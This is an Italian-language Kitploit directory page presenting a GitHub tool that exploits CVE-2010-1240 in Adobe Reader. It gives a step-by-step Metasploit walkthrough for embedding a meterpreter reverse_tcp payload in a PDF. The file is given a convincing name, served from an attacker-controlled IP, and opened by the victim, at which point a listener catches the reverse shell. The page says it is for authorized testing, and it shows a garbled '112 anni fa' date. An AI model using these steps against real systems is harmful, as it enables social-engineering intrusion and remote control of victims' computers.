Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2010-1240 — Strumento basato su Metasploit per l'incorporamento di backdoor in PDF che sfrutta CVE-2010-1240 per distribuire payload meterpreter tramite ingegneria sociale per test di penetrazione autorizzati. | Kitploit
Strumenti/GitHubGitHub/asepsaepdin/cve-2010-1240
Strumenti di PhishingFramework di ExploitSfruttamento di Applicazioni WebPenetration TestingIngegneria SocialeSviluppo Payload
GitHubasepsaepdin/cve-2010-1240

CVE-2010-1240

Strumento basato su Metasploit per l'incorporamento di backdoor in PDF che sfrutta CVE-2010-1240 per distribuire payload meterpreter tramite ingegneria sociale per test di penetrazione autorizzati.

Vedi Repository
112 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2010-1240 - Inserimento di backdoor in un PDF

Python


⚠️ Solo a scopo didattico e per ricerche di sicurezza autorizzate

Descrizione

Adobe Reader e Acrobat 9.x precedenti a 9.3.3, e 8.x precedenti a 8.2.3 su Windows e Mac OS X, non limitano il contenuto di un campo di testo nella finestra di avviso di apertura file, rendendo più facile per aggressori remoti ingannare gli utenti inducendoli a eseguire un programma locale arbitrario specificato in un documento PDF, come dimostrato da un campo di testo che afferma che il pulsante Apri consentirà all'utente di leggere un messaggio crittografato.

Demo

Animation

Guide passo-passo

  1. Per prima cosa, esegui msfconsole

    root@kitploit:~
    msfconsole
    
  2. Quindi, imposta il payload per l'incorporamento nel pdf

    root@kitploit:~
    use exploit/windows/fileformat/adobe_pdf_embedded_exe
    
  3. imposta l'opzione INFILENAME e fornisci il percorso diretto del file pdf originale

    root@kitploit:~
    set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
    
  4. imposta il nome del nuovo file PDF malevolo creato con un nome più convincente impostando l'opzione FILENAME

    root@kitploit:~
    set FILENAME laporan.pdf
    
  5. Trova e incorpora il payload nel file PDF

    root@kitploit:~
    set payload windows/meterpreter/reverse_tcp
    
  6. Imposta l'opzione LHOST con l'IP dell'attaccante

    root@kitploit:~
    set LHOST 172.16.10.10
    
  7. Apri un nuovo terminale e naviga fino alla posizione del file PDF malevolo

    root@kitploit:~
    cd .msf4/local/
    
  8. Crea un server temporaneo in python

    root@kitploit:~
    python -m http.server
    
  9. Scarica il file PDF malevolo sulla macchina vittima

    root@kitploit:~
    http://172.16.10.10:8000/certificate.pdf
    
  10. Prima di eseguire il file PDF malevolo sulla macchina vittima, avvia il listener sul terminale precedente

    root@kitploit:~
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 172.16.10.10
    exploit
    
  11. Una volta che il file PDF malevolo viene eseguito sulla macchina vittima, ti darà una connessione alla macchina vittima

Crediti

  • https://nvd.nist.gov/vuln/detail/CVE-2010-1240
  • https://medium.com/purple-team/embedding-backdoor-into-pdf-files-1781dfce62b1
  • https://github.com/Jasmoon99/Embedded-PDF
Scarica lo strumento